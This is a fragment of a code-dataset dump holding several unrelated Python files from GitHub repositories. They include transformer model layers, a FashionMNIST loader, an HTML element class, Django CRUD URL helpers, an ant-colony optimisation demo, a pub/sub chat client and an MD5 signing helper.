mask = mask.unsqueeze(1)\n        nbatches = query.size(0)\n\n        # 1) reshape q, k, v: [batch, L, d_model] -> [batch, h, L, d_model/h]\n        query, key, value = \\\n            [l(x).view(nbatches, -1, self.h, self.d_k).transpose(1, 2)\n             for l, x in zip(self.linears, (query, key, value))]\n\n        # 2) compute the attention, giving attn*v and attn\n        # qkv :[batch, h, L, d_model/h] -->x:[b, h, L, d_model/h], attn[b, h, L, L]\n        x, self.attn = attention(query, key, value, mask=mask, dropout=self.dropout,group_prob=group_prob)\n        # 3) merge the per-head results back into the original input shape\n        x = x.transpose(1, 2).contiguous().view(nbatches, -1, self.h * self.d_k)\n        # finally pass through one more linear layer\n        return self.linears[-1](x)\n\n\nclass GroupAttention(nn.Module):\n    def __init__(self, d_model, dropout=0.8):\n        super(GroupAttention, self).__init__()\n        self.d_model = 256.\n        self.linear_key = nn.Linear(d_model, d_model)\n        self.linear_query = nn.Linear(d_model, d_model)\n        # self.linear_output = nn.Linear(d_model, d_model)\n        self.norm = LayerNorm(d_model)\n        self.dropout = nn.Dropout(dropout)\n\n    def forward(self, context, eos_mask, prior):\n\n        batch_size, seq_len = context.size()[:2]\n        context = self.norm(context)\n\n        a = torch.from_numpy(np.diag(np.ones(seq_len - 1, dtype=np.int32), 1)).cuda()\n        b = torch.from_numpy(np.diag(np.ones(seq_len, dtype=np.int32), 0)).cuda()\n        c = torch.from_numpy(np.diag(np.ones(seq_len - 1, dtype=np.int32), -1)).cuda()\n        tri_matrix = torch.from_numpy(np.triu(np.ones([seq_len, seq_len], dtype=np.float32), 0)).cuda()\n\n        # mask = eos_mask & (a+c) | b\n        # a = torch.from_numpy(np.diag(np.ones(seq_len - 1, dtype=np.int32), 1))\n        # b = torch.from_numpy(np.diag(np.ones(seq_len, dtype=np.int32), 0))\n        # c = torch.from_numpy(np.diag(np.ones(seq_len - 1, dtype=np.int32), -1))\n        # tri_matrix = torch.from_numpy(np.triu(np.ones([seq_len, seq_len], dtype=np.float32), 0))\n\n        mask = eos_mask.long() & (a + c).bool()\n\n        key = self.linear_key(context)\n        query = self.linear_query(context)\n\n        scores = torch.matmul(query, key.transpose(-2, -1)) / self.d_model  # Q · K^T / d\n\n        scores = scores.masked_fill(mask == 0, -1e9)\n        neibor_attn = F.softmax(scores, dim=-1)\n        neibor_attn = torch.sqrt(neibor_attn * neibor_attn.transpose(-2, -1) + 1e-9)\n        neibor_attn = prior + (1. 
- prior) * neibor_attn\n\n t = torch.log(neibor_attn + 1e-9).masked_fill(a == 0, 0).matmul(tri_matrix)\n g_attn = tri_matrix.matmul(t).exp().masked_fill((tri_matrix.int() - b) == 0, 0)\n g_attn = g_attn + g_attn.transpose(-2, -1) + neibor_attn.masked_fill(b == 0, 1e-9)\n return g_attn\n # return g_attn, neibor_attn # prior matrix C and the per-layer attention sequence a\n\n# Position-wise Feed-Forward Networks\nclass PositionwiseFeedForward(nn.Module):\n \"Implements the position-wise FFN\"\n\n def __init__(self, d_model, d_ff, dropout=0.1):\n super(PositionwiseFeedForward, self).__init__()\n self.w_1 = nn.Linear(d_model, d_ff)\n self.w_2 = nn.Linear(d_ff, d_model)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x):\n # return self.w_2(self.dropout(F.relu(self.w_1(x))))\n return self.w_2(self.dropout(gelu(self.w_1(x))))\n\n# Embeddings\nclass Embeddings(nn.Module):\n def __init__(self, d_model, vocab):\n super(Embeddings, self).__init__()\n self.lut = nn.Embedding(vocab, d_model)\n self.d_model = d_model # the embedding dimension\n\n def forward(self, x):\n return self.lut(x) * math.sqrt(self.d_model)\n\n\n# Positional Encoding\nclass PositionalEncoding(nn.Module):\n \"Implements sinusoidal positional encoding\"\n\n def __init__(self, d_model, dropout, max_len=256):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0., max_len).unsqueeze(1)\n div_term = torch.exp(torch.arange(0., d_model, 2) *\n -(math.log(10000.0) / d_model))\n\n pe[:, 0::2] = torch.sin(position * div_term) # even columns\n pe[:, 1::2] = torch.cos(position * div_term) # odd columns\n pe = pe.unsqueeze(0) # [1, max_len, d_model]\n self.register_buffer('pe', pe)\n\n def forward(self, x):\n x = x + Variable(self.pe[:, :x.size(1)], requires_grad=False)\n return self.dropout(x)\n\ndef gelu(x):\n \"\"\"Implementation of the gelu activation function.\n For information: OpenAI GPT's gelu is slightly different (and gives slightly different results):\n 0.5 * x * (1 + torch.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * torch.pow(x, 3))))\n Also see https://arxiv.org/abs/1606.08415\n \"\"\"\n return x * 0.5 * (1.0 + torch.erf(x / math.sqrt(2.0)))\n# A function that takes hyperparameters and builds the complete model\ndef make_model(src_vocab, tgt_vocab, N=6, d_model=512, d_ff=2048, h=8, dropout=0.1):\n \"Construct a model from the given hyperparameters\"\n c = copy.deepcopy\n attn = MultiHeadedAttention(h, d_model)\n group_attn = GroupAttention(d_model)\n ff = PositionwiseFeedForward(d_model, d_ff, dropout)\n\n position = PositionalEncoding(d_model, dropout)\n model = EncoderDecoder(\n Encoder(EncoderLayer(d_model, c(attn), c(ff), group_attn,dropout), N,d_model,src_vocab),\n Decoder(DecoderLayer(d_model, c(attn), c(attn),\n c(ff), dropout), N),\n nn.Sequential(Embeddings(d_model, src_vocab), c(position)),\n nn.Sequential(Embeddings(d_model, tgt_vocab), c(position)),\n Generator(d_model, tgt_vocab))\n\n # Initialize parameters with Xavier uniform; this is important\n for p in model.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n return model","repo_name":"iceraionly/MyTree-Transformer","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":12843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16830147500","text":"# -*- coding: utf-8 -*-\n\nfrom torchvision import datasets\nfrom torchvision import transforms\nfrom torch.utils.data import DataLoader\n\nBATCH_SIZE = 128\n\n# Note transforms.ToTensor() scales input images\n# to 0-1 range\n\nresize_transform = transforms.Compose([transforms.Resize((32, 32)),\n transforms.ToTensor()])\n\ntrain_dataset = 
datasets.FashionMNIST(root='data',\n\t\t\t\t\t\t\t\t\t train=True,\n\t\t\t\t\t\t\t\t\t transform=resize_transform,\n\t\t\t\t\t\t\t\t\t download=False)\n\ntest_dataset = datasets.FashionMNIST(root='data',\n\t\t\t\t\t\t\t\t\t train=False,\n\t\t\t\t\t\t\t\t\t transform=resize_transform)\n\ntrain_loader = DataLoader(dataset=train_dataset,\n\t\t\t\t\t\t batch_size=BATCH_SIZE,\n\t\t\t\t\t\t shuffle=True)\n\ntest_loader = DataLoader(dataset=test_dataset,\n\t\t\t\t\t\t batch_size=BATCH_SIZE,\n\t\t\t\t\t\t shuffle=True)\n\n# # Checking the dataset\n# for images, labels in train_loader:\n# \tprint('Image batch dimensions:', images.shape)\n# \tprint('Image label dimensions:', labels.shape)\n# \tbreak\n","repo_name":"SeventeenChen/fashionMNIST_LeNet_master","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"40428073110","text":"from lxml.html import HtmlElement, etree\nfrom numpy import mean\n\n\nclass Element(HtmlElement):\n _id: int = None\n _selector: str = None\n _parent_selector: str = None\n _alias: str = None\n _tag_name: str = None\n _path: str = None\n _path_raw: str = None\n _children = None\n _parent = None\n _siblings = None\n _descendants = None\n _text = None\n _number_of_char: int = None\n _number_of_a_char: int = None\n _number_of_punctuation: int = None\n _number_of_a_descendants: int = None\n _number_of_p_descendants: int = None\n _number_of_children: int = None\n _number_of_siblings: int = None\n _number_of_descendants: int = None\n _density_of_punctuation: float = None\n _density_of_text: float = None\n _density_score: float = None\n _similarity_with_siblings: float = None\n _a_descendants: list = None\n _a_descendants_group: dict = None\n _a_descendants_group_text_length: dict = None\n _a_descendants_group_text_min_length: float = None\n _a_descendants_group_text_max_length: float = None\n \n density_score: float = None\n \n @property\n def id(self):\n \"\"\"\n get id by hashed element\n :return:\n \"\"\"\n if self._id is not None:\n return self._id\n self._id = hash(self)\n return self._id\n \n @property\n def nth(self):\n \"\"\"\n get nth index of this element in parent element\n :return:\n \"\"\"\n return len(list(self.itersiblings(preceding=True))) + 1\n \n \n @property\n def alias(self):\n \"\"\"\n get alias of element, using all attributes to construct it.\n :return: string\n \"\"\"\n if self._alias is not None:\n return self._alias\n from gerapy_auto_extractor.utils.element import alias\n self._alias = alias(self)\n return self._alias\n \n @property\n def selector(self):\n \"\"\"\n get css selector of this element\n :return:\n \"\"\"\n if self._selector is not None:\n return self._selector\n from gerapy_auto_extractor.utils.element import selector\n self._selector = selector(self)\n return self._selector\n \n @property\n def children(self):\n \"\"\"\n get children of this element\n :return: \n \"\"\"\n if self._children is not None:\n return self._children\n from gerapy_auto_extractor.utils.element import children\n self._children = list(children(self))\n return self._children\n \n @property\n def siblings(self):\n \"\"\"\n get siblings of this element\n :return: \n \"\"\"\n if self._siblings is not None:\n return self._siblings\n from gerapy_auto_extractor.utils.element import siblings\n self._siblings = list(siblings(self))\n return self._siblings\n \n @property\n def descendants(self):\n \"\"\"\n get descendants of this 
element\n :return: \n \"\"\"\n if self._descendants is not None:\n return self._descendants\n from gerapy_auto_extractor.utils.element import descendants\n self._descendants = list(descendants(self))\n return self._descendants\n \n @property\n def parent_selector(self):\n \"\"\"\n get css selector of the parent element\n :return:\n \"\"\"\n if self._parent_selector is not None:\n return self._parent_selector\n from gerapy_auto_extractor.utils.element import selector, parent\n # TODO: change parent(self) to self.parent\n p = parent(self)\n if p is not None:\n self._parent_selector = selector(p)\n return self._parent_selector\n \n @property\n def tag_name(self):\n \"\"\"\n return tag name\n :return:\n \"\"\"\n if self._tag_name:\n return self._tag_name\n self._tag_name = self.tag\n return self._tag_name\n \n @property\n def text(self):\n \"\"\"\n get text of element\n :return:\n \"\"\"\n if self._text is not None:\n return self._text\n from gerapy_auto_extractor.utils.element import text\n self._text = text(self)\n return self._text\n \n @property\n def string(self):\n \"\"\"\n return string of element\n :return:\n \"\"\"\n return etree.tostring(self, pretty_print=True, encoding=\"utf-8\", method='html').decode('utf-8')\n \n @property\n def path(self):\n \"\"\"\n get tag path using external path function\n :return:\n \"\"\"\n if self._path is not None:\n return self._path\n from gerapy_auto_extractor.utils.element import path\n self._path = path(self)\n return self._path\n \n @property\n def path_raw(self):\n \"\"\"\n get tag raw path using external path raw function\n :return:\n \"\"\"\n if self._path_raw is not None:\n return self._path_raw\n from gerapy_auto_extractor.utils.element import path_raw\n self._path_raw = path_raw(self)\n return self._path_raw\n \n @property\n def number_of_char(self):\n \"\"\"\n get text length\n :return:\n \"\"\"\n if self._number_of_char is not None:\n return self._number_of_char\n from gerapy_auto_extractor.utils.element import number_of_char\n self._number_of_char = number_of_char(self)\n return self._number_of_char\n \n @property\n def number_of_a_descendants(self):\n \"\"\"\n get number of a descendants\n :return:\n \"\"\"\n if self._number_of_a_descendants is not None:\n return self._number_of_a_descendants\n from gerapy_auto_extractor.utils.element import number_of_a_descendants\n self._number_of_a_descendants = number_of_a_descendants(self)\n return self._number_of_a_descendants\n \n @property\n def number_of_a_char(self):\n \"\"\"\n get a text length\n :return:\n \"\"\"\n if self._number_of_a_char is not None:\n return self._number_of_a_char\n from gerapy_auto_extractor.utils.element import number_of_a_char\n self._number_of_a_char = number_of_a_char(self)\n return self._number_of_a_char\n \n @property\n def number_of_p_descendants(self):\n \"\"\"\n get number of p descendants\n :return:\n \"\"\"\n if self._number_of_p_descendants is not None:\n return self._number_of_p_descendants\n from gerapy_auto_extractor.utils.element import number_of_p_descendants\n self._number_of_p_descendants = number_of_p_descendants(self)\n return self._number_of_p_descendants\n \n @property\n def number_of_punctuation(self):\n \"\"\"\n get number of punctuation\n :return:\n \"\"\"\n if self._number_of_punctuation is not None:\n return self._number_of_punctuation\n from gerapy_auto_extractor.utils.element import number_of_punctuation\n self._number_of_punctuation = number_of_punctuation(self)\n return self._number_of_punctuation\n \n @property\n def number_of_children(self):\n \"\"\"\n 
get children number\n :return:\n \"\"\"\n if self._number_of_children is not None:\n return self._number_of_children\n self._number_of_children = len(list(self.children))\n return self._number_of_children\n \n @property\n def number_of_siblings(self):\n \"\"\"\n get number of siblings\n :return:\n \"\"\"\n if self._number_of_siblings is not None:\n return self._number_of_siblings\n self._number_of_siblings = len(list(self.siblings))\n return self._number_of_siblings\n \n @property\n def number_of_descendants(self):\n \"\"\"\n get number of descendants\n :return:\n \"\"\"\n if self._number_of_descendants is not None:\n return self._number_of_descendants\n self._number_of_descendants = len(list(self.descendants))\n return self._number_of_descendants\n \n @property\n def density_of_punctuation(self):\n \"\"\"\n get density of punctuation\n :return:\n \"\"\"\n if self._density_of_punctuation is not None:\n return self._density_of_punctuation\n from gerapy_auto_extractor.utils.element import density_of_punctuation\n self._density_of_punctuation = density_of_punctuation(self)\n return self._density_of_punctuation\n \n @property\n def density_of_text(self):\n \"\"\"\n get density of text\n :return:\n \"\"\"\n if self._density_of_text is not None:\n return self._density_of_text\n from gerapy_auto_extractor.utils.element import density_of_text\n self._density_of_text = density_of_text(self)\n return self._density_of_text\n \n @property\n def similarity_with_siblings(self):\n \"\"\"\n get similarity with siblings\n :return:\n \"\"\"\n if self._similarity_with_siblings is not None:\n return self._similarity_with_siblings\n from gerapy_auto_extractor.utils.element import similarity_with_siblings\n self._similarity_with_siblings = similarity_with_siblings(self)\n return self._similarity_with_siblings\n \n @property\n def a_descendants(self):\n \"\"\"\n get linked descendants\n :return:\n \"\"\"\n if self._a_descendants is not None:\n return self._a_descendants\n from gerapy_auto_extractor.utils.element import a_descendants\n self._a_descendants = a_descendants(self)\n return self._a_descendants\n \n @property\n def a_descendants_group(self):\n \"\"\"\n get linked descendants group\n :return:\n \"\"\"\n if self._a_descendants_group is not None:\n return self._a_descendants_group\n from gerapy_auto_extractor.utils.element import a_descendants_group\n self._a_descendants_group = a_descendants_group(self)\n return self._a_descendants_group\n \n @property\n def a_descendants_group_text_length(self):\n \"\"\"\n grouped linked text length\n :return:\n \"\"\"\n if self._a_descendants_group_text_length is not None:\n return self._a_descendants_group_text_length\n result = {}\n from gerapy_auto_extractor.utils.element import text\n for path, elements in self.a_descendants_group.items():\n lengths = []\n for element in elements:\n # TODO: convert len(text(element)) to element.number_of_char\n lengths.append(len(text(element)))\n mean_length = mean(lengths) if len(lengths) else 0\n result[path] = mean_length\n self._a_descendants_group_text_length = result\n return self._a_descendants_group_text_length\n \n @property\n def a_descendants_group_text_min_length(self):\n \"\"\"\n get grouped linked text min length\n :return:\n \"\"\"\n if self._a_descendants_group_text_min_length is not None:\n return self._a_descendants_group_text_min_length\n values = self.a_descendants_group_text_length.values()\n self._a_descendants_group_text_min_length = min(values) if values else 0\n return self._a_descendants_group_text_min_length\n 
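# Illustrative sketch, not part of the original file: every property above follows the\n # same memoize-on-first-access pattern. A standalone analogue (expensive_count() is a\n # hypothetical stand-in for the real computation):\n #\n # class Cached:\n # _n = None\n #\n # @property\n # def n(self):\n # if self._n is None:\n # self._n = expensive_count()\n # return self._n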
\n @property\n def a_descendants_group_text_max_length(self):\n \"\"\"\n get grouped linked text max length\n :return:\n \"\"\"\n if self._a_descendants_group_text_max_length is not None:\n return self._a_descendants_group_text_max_length\n values = self.a_descendants_group_text_length.values()\n self._a_descendants_group_text_max_length = max(values) if values else 0\n return self._a_descendants_group_text_max_length\n \n @property\n def a_descendants_group_text_avg_length(self):\n \"\"\"\n get grouped linked text avg length\n :return:\n \"\"\"\n values = list(self.a_descendants_group_text_length.values())\n return mean(values) if values else 0\n \n def __str__(self):\n \"\"\"\n rewrite str\n :return:\n \"\"\"\n return f'<Element {self.tag} of {self.path}>'\n \n def __repr__(self):\n \"\"\"\n rewrite repr\n :return:\n \"\"\"\n return self.__str__()\n","repo_name":"Gerapy/GerapyAutoExtractor","sub_path":"gerapy_auto_extractor/schemas/element.py","file_name":"element.py","file_ext":"py","file_size_in_byte":12594,"program_lang":"python","lang":"en","doc_type":"code","stars":282,"dataset":"github-code","pt":"48"} +{"seq_id":"72708643665","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.conf.urls import url\nfrom django.apps import apps\nfrom django.contrib.auth.decorators import login_required, permission_required\n\nfrom . import utils\nfrom .views import (\n CRUDCreateView,\n CRUDDeleteView,\n CRUDDetailView,\n CRUDListView,\n CRUDUpdateView,\n)\n\n\nclass CrudsUrlValidatorException(Exception):\n def __init__(self, message, errors=None):\n super(CrudsUrlValidatorException, self).__init__(message)\n self.errors = errors\n\n\ndef create_url_view(view=None, login_reqd=False, permission_reqd=None,\n login_url=None):\n if view is None:\n raise CrudsUrlValidatorException(u\"CRUDS URL VALIDATOR ERROR: \\\n View Required \\\n \") \n if login_reqd:\n if permission_reqd is not None:\n raise CrudsUrlValidatorException(u\"CRUDS URL VALIDATOR ERROR: \\\n Login Required and Permission Required cannot be both passed \\\n \")\n return login_required(view)\n else:\n if permission_reqd is not None:\n if login_url == \"\" or login_url is None:\n raise CrudsUrlValidatorException(u\"CRUDS URL VALIDATOR \\\n ERROR: Permission Required requires login_url \\\n \")\n return permission_required(permission_reqd,\n login_url=login_url)(view)\n else:\n return view\n\ndef crud_urls(model,\n list_view=None,\n create_view=None,\n update_view=None,\n detail_view=None,\n delete_view=None,\n url_prefix=None,\n name_prefix=None,\n list_views=None,\n login_reqd=False,\n permission_reqd=None,\n login_url='login',\n **kwargs):\n \"\"\"Returns a list of url patterns for model.\n\n :param list_view:\n :param create_view:\n :param update_view:\n :param detail_view:\n :param delete_view:\n :param url_prefix: prefix to prepend, default is `'^'`\n :param name_prefix: prefix to prepend to name, default is empty string\n :param list_views(dict): additional list views\n :param **kwargs: additional detail views\n :returns: urls\n \"\"\"\n if url_prefix is None:\n url_prefix = r'^'\n urls = []\n if list_view:\n urls.append(url(\n url_prefix + '$',\n create_url_view(list_view, login_reqd, permission_reqd, login_url),\n name=utils.crud_url_name(model, utils.ACTION_LIST,\n name_prefix)\n ))\n if create_view:\n urls.append(url(\n 
url_prefix + r'new/$',\n create_url_view(create_view, login_reqd, permission_reqd,\n login_url),\n #create_view,\n name=utils.crud_url_name(model, utils.ACTION_CREATE, name_prefix)\n ))\n if detail_view:\n urls.append(url(\n url_prefix + r'(?P<pk>\\d+)/$',\n create_url_view(detail_view, login_reqd, permission_reqd,\n login_url),\n #detail_view,\n name=utils.crud_url_name(model, utils.ACTION_DETAIL, name_prefix)\n ))\n if update_view:\n urls.append(url(\n url_prefix + r'(?P<pk>\\d+)/edit/$',\n create_url_view(update_view, login_reqd, permission_reqd,\n login_url),\n #update_view,\n name=utils.crud_url_name(model, utils.ACTION_UPDATE, name_prefix)\n ))\n if delete_view:\n urls.append(url(\n url_prefix + r'(?P<pk>\\d+)/remove/$',\n create_url_view(delete_view, login_reqd, permission_reqd,\n login_url),\n #delete_view,\n name=utils.crud_url_name(model, utils.ACTION_DELETE, name_prefix)\n ))\n\n if list_views is not None:\n for name, view in list_views.items():\n urls.append(url(\n url_prefix + r'%s/$' % name,\n create_url_view(view, login_reqd, permission_reqd,\n login_url),\n #view,\n name=utils.crud_url_name(model, name, name_prefix)\n ))\n\n for name, view in kwargs.items():\n urls.append(url(\n url_prefix + r'(?P<pk>\\d+)/%s/$' % name,\n create_url_view(view, login_reqd, permission_reqd,\n login_url),\n #view,\n name=utils.crud_url_name(model, name, name_prefix)\n ))\n return urls\n\n\ndef crud_for_model(model, urlprefix=None, login_rqd=False, perm_rqd=None,\n login_url=None):\n \"\"\"Returns list of ``url`` items to CRUD a model.\n \"\"\"\n model_lower = model.__name__.lower()\n\n if urlprefix is None:\n urlprefix = ''\n urlprefix += model_lower + '/'\n\n urls = crud_urls(\n model,\n list_view=CRUDListView.as_view(model=model),\n create_view=CRUDCreateView.as_view(model=model),\n detail_view=CRUDDetailView.as_view(model=model),\n update_view=CRUDUpdateView.as_view(model=model),\n delete_view=CRUDDeleteView.as_view(model=model),\n url_prefix=urlprefix,\n login_reqd=login_rqd,\n permission_reqd=perm_rqd,\n login_url=login_url\n )\n return urls\n\n\ndef crud_for_app(app_label,\n urlprefix=None,\n login_required=False,\n permission_required=None,\n login_url=None):\n \"\"\"\n Returns list of ``url`` items to CRUD an app.\n \"\"\"\n if urlprefix is None:\n urlprefix = app_label + '/'\n app = apps.get_app_config(app_label)\n urls = []\n for model in app.get_models():\n urls += crud_for_model(model, urlprefix, login_required, \n permission_required, login_url)\n return urls\n\n","repo_name":"renzcoldsun/django-cruds","sub_path":"cruds/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"27532161860","text":"import torch\nimport torch.nn as nn\n\n\nclass EuclideanDistance(nn.Module):\n def __init__(self, reduction=\"mean\"):\n super().__init__()\n\n self.reduction = getattr(torch, reduction, lambda x: x)\n\n def forward(self, outputs, targets):\n \"\"\"\n Args:\n outputs (torch.tensor): Torch tensor with shape (bs, seq_len, N_art, 2, N_samples).\n targets (torch.tensor): Torch tensor with shape (bs, seq_len, N_art, 2, N_samples).\n \"\"\"\n x_outputs = outputs[..., 0, :].clone()\n y_outputs = outputs[..., 1, :].clone()\n\n x_targets = targets[..., 0, :].clone()\n y_targets = targets[..., 1, :].clone()\n\n dist = torch.sqrt((x_outputs - x_targets) ** 2 + (y_outputs - y_targets) ** 2)\n return self.reduction(dist)\n\n\nclass MeanP2CPDistance(nn.Module):\n def __init__(self, 
reduction=\"mean\"):\n super().__init__()\n self.reduction = getattr(torch, reduction, lambda x: x)\n\n def forward(self, u_, v_):\n \"\"\"\n Args:\n u_ (torch.tensor): Tensor of shape (*, N, 2)\n v_ (torch.tensor): Tensor of shape (*, M, 2)\n \"\"\"\n n = u_.shape[-2]\n m = v_.shape[-2]\n\n dist_matrix = torch.cdist(u_, v_)\n u2cp, _ = dist_matrix.min(axis=-1)\n v2cp, _ = dist_matrix.min(axis=-2)\n mean_p2cp = (torch.sum(u2cp, dim=-1) / n + torch.sum(v2cp, dim=-1) / m) / 2\n\n return self.reduction(mean_p2cp)\n","repo_name":"vribeiro1/artspeech","sub_path":"phoneme_to_articulation/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"10824822093","text":"from graph import Graph\nfrom aco import AntColonyOpt as ACO\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef eval_aco(aco, graph):\n '''\n checks how long an ant needs from a specific start point to the goal to compare the optimization process over time.\n :param aco:\n :param graph:\n :return:\n '''\n dists = []\n nodes = [(1,1), (5,9), (3,5), (9,9), (8,1)]\n for i in nodes:\n dists.append(aco.test(start=i, goal=graph.goal))\n return dists\n\n\nif __name__ == \"__main__\":\n\n # define algorithm parameters\n num_ants = 20\n evaporation_rate = 0.05\n initial_pheromone = 0.01\n num_iterations = 100\n alpha = 0.8\n beta = 0.6\n\n width = 10\n height = 10\n\n #characters = \"abcdefghijklmnopqrstuvwxyz123456789\"\n #grid = np.array([char for char in characters]).reshape((5, 7))\n\n # Initialize the test_dict with the connections within a grid\n test_dict = {}\n for i in range(0, width):\n for j in range(0, height):\n\n node = (i,j)\n test_dict[node] = []\n\n # 'connect' current node with the left, right, up, down neighbours\n if i >= 1:\n test_dict[node].append((i-1, j))\n if j >= 1:\n test_dict[node].append((i, j-1))\n if i < width-1:\n test_dict[node].append((i+1, j))\n if j < height-1:\n test_dict[node].append((i, j+1))\n\n goal = (3,3)\n test_graph = Graph(test_dict, goal=goal, pheromone_value=initial_pheromone)\n test_ACO = ACO(test_graph, evaporation_rate, alpha, beta)\n\n test_dists = []\n\n # start ant colony optimization\n for i in range(0, num_iterations):\n\n if i % 10 == 0:\n test_dists.append(eval_aco(test_ACO, test_graph))\n\n print(\"Iteration \", i)\n test_ACO.tmp = Graph(test_dict)\n #foodsources = [\"c\", \"l\", \"z\", \"5\"]\n\n # in each iteration, each ant is supposed to find the food source starting from a random position\n for _ in range(0, num_ants):\n start = random.choice(test_graph.get_nodes())\n test_ACO.create_path(start=start, foodsources=[], goal=goal)\n test_ACO.pheromone_update()\n\n # img = np.zeros(grid.shape).astype(np.float64)\n # for (i, j) in test_ACO.graph.get_pheromones().keys():\n # img[grid == j] += test_ACO.graph.get_pheromones()[(i, j)]\n #\n # plt.imshow(img, cmap='gray')\n # plt.show()\n\n final_pheromones = test_ACO.graph.get_pheromones()\n\n # visualize the process of the optimization process thorugh the length of the path for the same start and end points\n test_dists.append(eval_aco(test_ACO, test_graph))\n test_dists = np.asarray(test_dists)\n x_pts = range(len(test_dists))\n marker = ['r.', 'b.', 'g.', 'y.', 'm.']\n test_dists = np.swapaxes(test_dists, 0, 1)\n for i in range(5):\n plt.plot(x_pts, test_dists[i], marker[i])\n plt.grid()\n plt.show()\n\n #img = np.zeros(grid.shape).astype(np.float64)\n #for (i, j) in 
final_pheromones.keys():\n # img[grid == j] += final_pheromones[(i, j)]\n\n #plt.imshow(img, cmap='gray')\n #plt.show()\n\n\n\n\n","repo_name":"NatureInspiredAlgorithms-Group-B/Ant_Colony_Optimization","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10609829304","text":"#!/usr/bin/env python\nimport pubsub\nimport threading\n\n__author__ = 'David'\n\nsample = pubsub.PubSub(addr='addigy-dev.cis.fiu.edu', queue_name='david', username='david', password='guest', auto_delete=True, heartbeat_interval=60, organization='testcorp')\n\nMESSAGES_EXCHANGE = sample.get_messageexchange()\nPRESENCE_EXCHANGE = sample.get_presenceexchange()\n\n\ndef callback(channel, method_frame, header_frame, body):\n exchange = method_frame.exchange\n if exchange == PRESENCE_EXCHANGE:\n action = header_frame.headers['action']\n who = header_frame.headers['key']\n if action == 'bind':\n print('User %s entered the room.' % (who,))\n elif action == 'unbind':\n print('User %s left the room.' % (who,))\n elif exchange == MESSAGES_EXCHANGE:\n who = method_frame.routing_key\n print('%s: %s' % (who, body))\n\nstarted = False\n\n\ndef consume():\n sample.subscribe(callback, queue_name='david', no_ack=True)\n\nwhile True:\n if started is False:\n thread = threading.Thread(target=consume)\n thread.start()\n started = True\n\n message = input(\"\")\n\n if message == \"exit\":\n sample.disconnect()\n\n sample.publish(routing_key='david',\n body=message)\n\n\n","repo_name":"FIU-SCIS-Senior-Projects/Addigy4","sub_path":"Code/subpub/python/Clients/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"20144937727","text":"import hashlib\nimport json\n\n\ndef sign(params,key):\n paramsdict = json.loads(params)\n # list comprehension: concatenate each key and value, skipping empty values and the sign field\n a = [\"\".join(i) for i in paramsdict.items() if i[1] and i[0]!= \"sign\"]\n print(a)\n\n # sort the parameter strings by ASCII code in ascending order\n strA = \"\".join(sorted(a))\n print(strA)\n\n # append the key to strA to get the string to sign\n strsign = strA + key\n print(strsign)\n\n m = hashlib.md5()\n m.update(strsign.lower().encode('UTF-8'))\n\n sign = m.hexdigest()\n\n paramsdict['sign'] = sign\n print(paramsdict)\n\n paramsstr=json.dumps(paramsdict)\n print(paramsdict)\n return paramsdict\n\n\n\n\nif __name__=='__main__':\n key = \"1234567890\"\n params={\n \"useraname\":\"uusjsjjs\",\n \"password\":\"ahagyd5882\"\n }\n\n jsonparam = json.dumps(params)\n\n result = sign(jsonparam,key)\n\n print(result)\n","repo_name":"wing112358/moduletest","sub_path":"lib/paramToSign.py","file_name":"paramToSign.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14038912107","text":"import FWCore.ParameterSet.Config as cms\n\n\ntriangleCutMTTopAndMTBJet = cms.EDFilter(\n\t\"TriangleCutFilter\",\n\tsrc1 = cms.InputTag(\"MTTop\"),\n\tsrc2 = cms.InputTag(\"MTBJet\"),\n\tsrc1Coeff = cms.double(1),\n\tsrc2Coeff = cms.double(2),\n\ttriangleMinCut = cms.double(1000),\n\ttriangleMaxCut = cms.double(999999999)\n\t)\n\ntriangleCutMTTop125AndMTBJet = cms.EDFilter(\n\t\"TriangleCutFilter\",\n\tsrc1 = cms.InputTag(\"MTTop125\"),\n\tsrc2 = cms.InputTag(\"MT125BJet\"),\n\tsrc1Coeff = cms.double(1),\n\tsrc2Coeff = cms.double(2),\n\ttriangleMinCut = cms.double(1000),\n\ttriangleMaxCut = 
